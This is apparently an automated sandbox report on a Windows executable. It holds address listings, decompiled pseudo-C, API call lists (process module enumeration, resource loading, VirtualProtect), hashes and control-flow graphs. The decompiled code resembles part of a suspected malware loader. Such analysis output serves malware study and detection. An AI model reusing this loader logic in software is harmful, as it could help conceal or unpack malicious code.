                                                                                                                                                                                                        0x00401f63
                                                                                                                                                                                                        0x00401f63
                                                                                                                                                                                                        0x00401f69
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f73
                                                                                                                                                                                                        0x00401f75
                                                                                                                                                                                                        0x00401f7b
                                                                                                                                                                                                        0x00401f80
                                                                                                                                                                                                        0x00401f81
                                                                                                                                                                                                        0x00401f86
                                                                                                                                                                                                        0x00401f86
                                                                                                                                                                                                        0x00401f8c
                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                        0x00401f9d
                                                                                                                                                                                                        0x00401fa2
                                                                                                                                                                                                        0x00401fa6
                                                                                                                                                                                                        0x00401fac
                                                                                                                                                                                                        0x00401faf
                                                                                                                                                                                                        0x00401fb6
                                                                                                                                                                                                        0x00401fbf
                                                                                                                                                                                                        0x00401fc4
                                                                                                                                                                                                        0x00401fc8
                                                                                                                                                                                                        0x00401fce
                                                                                                                                                                                                        0x00401fd3
                                                                                                                                                                                                        0x00401fe0
                                                                                                                                                                                                        0x00401fec
                                                                                                                                                                                                        0x00401ffe
                                                                                                                                                                                                        0x00402001
                                                                                                                                                                                                        0x00402006
                                                                                                                                                                                                        0x0040200b
                                                                                                                                                                                                        0x00402010
                                                                                                                                                                                                        0x00402015
                                                                                                                                                                                                        0x0040201a
                                                                                                                                                                                                        0x0040201f
                                                                                                                                                                                                        0x00402024
                                                                                                                                                                                                        0x00402029
                                                                                                                                                                                                        0x0040202e
                                                                                                                                                                                                        0x00402033
                                                                                                                                                                                                        0x00402038
                                                                                                                                                                                                        0x0040203d
                                                                                                                                                                                                        0x00402042
                                                                                                                                                                                                        0x00402047
                                                                                                                                                                                                        0x0040204c
                                                                                                                                                                                                        0x00402051
                                                                                                                                                                                                        0x00402056
                                                                                                                                                                                                        0x0040205b
                                                                                                                                                                                                        0x00402060
                                                                                                                                                                                                        0x00402065
                                                                                                                                                                                                        0x0040206a
                                                                                                                                                                                                        0x0040206f
                                                                                                                                                                                                        0x00402074
                                                                                                                                                                                                        0x00402079
                                                                                                                                                                                                        0x0040207e
                                                                                                                                                                                                        0x00402083
                                                                                                                                                                                                        0x00402088
                                                                                                                                                                                                        0x0040208d
                                                                                                                                                                                                        0x00402092
                                                                                                                                                                                                        0x00402097
                                                                                                                                                                                                        0x0040209c
                                                                                                                                                                                                        0x004020a1
                                                                                                                                                                                                        0x004020a5
                                                                                                                                                                                                        0x004020aa
                                                                                                                                                                                                        0x004020ae
                                                                                                                                                                                                        0x004020b4
                                                                                                                                                                                                        0x004020b6
                                                                                                                                                                                                        0x004020bb
                                                                                                                                                                                                        0x004020c0
                                                                                                                                                                                                        0x004020c5
                                                                                                                                                                                                        0x004020ca
                                                                                                                                                                                                        0x004020cf
                                                                                                                                                                                                        0x004020d4
                                                                                                                                                                                                        0x004020e1
                                                                                                                                                                                                        0x004020e6
                                                                                                                                                                                                        0x004020eb
                                                                                                                                                                                                        0x004020f0
                                                                                                                                                                                                        0x004020f5
                                                                                                                                                                                                        0x004020fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c7b
                                                                                                                                                                                                        0x00401c8f
                                                                                                                                                                                                        0x00401c8f
                                                                                                                                                                                                        0x00401c7d
                                                                                                                                                                                                        0x00401c7d
                                                                                                                                                                                                        0x00401c83
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c85
                                                                                                                                                                                                        0x00401c85
                                                                                                                                                                                                        0x00401c88
                                                                                                                                                                                                        0x00401c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c8d
                                                                                                                                                                                                        0x00401c83
                                                                                                                                                                                                        0x00401c98
                                                                                                                                                                                                        0x00401c9a
                                                                                                                                                                                                        0x00401cbd
                                                                                                                                                                                                        0x00401cc2
                                                                                                                                                                                                        0x00401cc5
                                                                                                                                                                                                        0x00401cc7
                                                                                                                                                                                                        0x00401cd0
                                                                                                                                                                                                        0x00401cd0
                                                                                                                                                                                                        0x00401cd2
                                                                                                                                                                                                        0x00401cd4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cd6
                                                                                                                                                                                                        0x00401cd8
                                                                                                                                                                                                        0x00401cec
                                                                                                                                                                                                        0x00401cec
                                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                                        0x00401cdd
                                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401ce2
                                                                                                                                                                                                        0x00401ce2
                                                                                                                                                                                                        0x00401ce5
                                                                                                                                                                                                        0x00401ce8
                                                                                                                                                                                                        0x00401cea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cea
                                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                                        0x00401cf5
                                                                                                                                                                                                        0x00401cf5
                                                                                                                                                                                                        0x00401cf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cf9
                                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                                        0x00401d07
                                                                                                                                                                                                        0x00401d09
                                                                                                                                                                                                        0x00401d10
                                                                                                                                                                                                        0x00401d1d
                                                                                                                                                                                                        0x00401d22
                                                                                                                                                                                                        0x00401d25
                                                                                                                                                                                                        0x00401d27
                                                                                                                                                                                                        0x00401d30
                                                                                                                                                                                                        0x00401d30
                                                                                                                                                                                                        0x00401d32
                                                                                                                                                                                                        0x00401d34
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d36
                                                                                                                                                                                                        0x00401d38
                                                                                                                                                                                                        0x00401d4c
                                                                                                                                                                                                        0x00401d4c
                                                                                                                                                                                                        0x00401d3a
                                                                                                                                                                                                        0x00401d3a
                                                                                                                                                                                                        0x00401d3d
                                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d42
                                                                                                                                                                                                        0x00401d42
                                                                                                                                                                                                        0x00401d45
                                                                                                                                                                                                        0x00401d48
                                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                                        0x00401d55
                                                                                                                                                                                                        0x00401d55
                                                                                                                                                                                                        0x00401d57
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d5d
                                                                                                                                                                                                        0x00401d6a
                                                                                                                                                                                                        0x00401d6f
                                                                                                                                                                                                        0x00401d72
                                                                                                                                                                                                        0x00401d74
                                                                                                                                                                                                        0x00401d80
                                                                                                                                                                                                        0x00401d80
                                                                                                                                                                                                        0x00401d82
                                                                                                                                                                                                        0x00401d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d86
                                                                                                                                                                                                        0x00401d88
                                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                                        0x00401d8d
                                                                                                                                                                                                        0x00401d90
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d92
                                                                                                                                                                                                        0x00401d92
                                                                                                                                                                                                        0x00401d95
                                                                                                                                                                                                        0x00401d98
                                                                                                                                                                                                        0x00401d9a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d9a
                                                                                                                                                                                                        0x00401d90
                                                                                                                                                                                                        0x00401da5
                                                                                                                                                                                                        0x00401da5
                                                                                                                                                                                                        0x00401da7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                        • API String ID: 2366190142-2962942730
                                                                                                                                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 152 4018f0-4018fa 153 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 152->153 154 4018fc-401900 152->154 157 401940-401949 GetLastError 153->157 158 401996-40199a 153->158 159 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 157->159 160 40198d-40198f 157->160 159->160 160->158 162 401991 call 401030 160->162 162->158
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __edx;
                                                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                                                        						_t12 = GetLastError();
                                                                                                                                                                                                        						if(_t12 == 0x7a) {
                                                                                                                                                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                        							asm("sbb esi, esi");
                                                                                                                                                                                                        							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                                        							_t12 = E00401030();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *__ecx = _t35;
                                                                                                                                                                                                        					return __eax;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3322701435-0
                                                                                                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 165 40af66-40af6e 166 40af7d-40af88 call 40b84d 165->166 169 40af70-40af7b call 40d2e3 166->169 170 40af8a-40af8b 166->170 169->166 173 40af8c-40af98 169->173 174 40afb3-40afca call 40af49 call 40cd39 173->174 175 40af9a-40afb2 call 40aefc call 40d2bd 173->175 175->174
                                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v4;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t40 = __edi;
                                                                                                                                                                                                        				_t28 = __ebx;
                                                                                                                                                                                                        				_t45 = _t51;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                        					__eflags = _t15;
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                        							__eflags =  *0x423490;
                                                                                                                                                                                                        							E0040AEFC(0x423484);
                                                                                                                                                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                        						asm("int3");
                                                                                                                                                                                                        						_t47 = _t45;
                                                                                                                                                                                                        						_push(_t47);
                                                                                                                                                                                                        						_push(0xc);
                                                                                                                                                                                                        						_push(0x420ff8);
                                                                                                                                                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                        						_t42 = _v4;
                                                                                                                                                                                                        						__eflags = _t42;
                                                                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                                                                        							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                        							if( *0x4250b0 != 3) {
                                                                                                                                                                                                        								_push(_t42);
                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E0040D6E0(_t28, 4);
                                                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                        								_t24 = E0040D713(_t42);
                                                                                                                                                                                                        								_v40 = _t24;
                                                                                                                                                                                                        								__eflags = _t24;
                                                                                                                                                                                                        								if(_t24 != 0) {
                                                                                                                                                                                                        									_push(_t42);
                                                                                                                                                                                                        									_push(_t24);
                                                                                                                                                                                                        									E0040D743();
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_v16 = 0xfffffffe;
                                                                                                                                                                                                        								_t19 = E0040B70B();
                                                                                                                                                                                                        								__eflags = _v40;
                                                                                                                                                                                                        								if(_v40 == 0) {
                                                                                                                                                                                                        									_push(_v4);
                                                                                                                                                                                                        									L16:
                                                                                                                                                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                        										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						return E0040E21D(_t19);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        				goto L19;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x0040b706
                                                                                                                                                                                                        0x0040b715
                                                                                                                                                                                                        0x0040b723
                                                                                                                                                                                                        0x0040b725
                                                                                                                                                                                                        0x0040b727
                                                                                                                                                                                                        0x0040b73a
                                                                                                                                                                                                        0x0040b73c
                                                                                                                                                                                                        0x0040b725
                                                                                                                                                                                                        0x0040b704
                                                                                                                                                                                                        0x0040b6cf
                                                                                                                                                                                                        0x0040b742
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040af7b
                                                                                                                                                                                                        0x0040af8b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1411284514-0
                                                                                                                                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 184 40e7ee-40e7f6 call 40e7c3 186 40e7fb-40e7ff ExitProcess 184->186
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040E7EE(int _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E0040E7C3(_a4); // executed
                                                                                                                                                                                                        				ExitProcess(_a4);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x0040e7f6
                                                                                                                                                                                                        0x0040e7ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 187 5170040-51700f4 VirtualProtect 190 51700f6-51700fc 187->190 191 51700fd-5170145 187->191 190->191
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 051700E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.407394725.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5130000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                        • Opcode ID: 078d607702bac820846fc9ab9631ad691b541b4ccc30ac15fbfe61a6d0a07653
                                                                                                                                                                                                        • Instruction ID: c723925463143c65eeb6a7e19d1532a044bf99f736c92c1d369ab625146c3edf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 078d607702bac820846fc9ab9631ad691b541b4ccc30ac15fbfe61a6d0a07653
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31A7B8D002189FCF10CFA9D984ADEFBB1BF49310F10902AE814B7210D739A945CF94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 196 5170300-517038e FindCloseChangeNotification 199 5170397-51703d9 196->199 200 5170390-5170396 196->200 200->199
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0517037E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.407394725.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5130000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
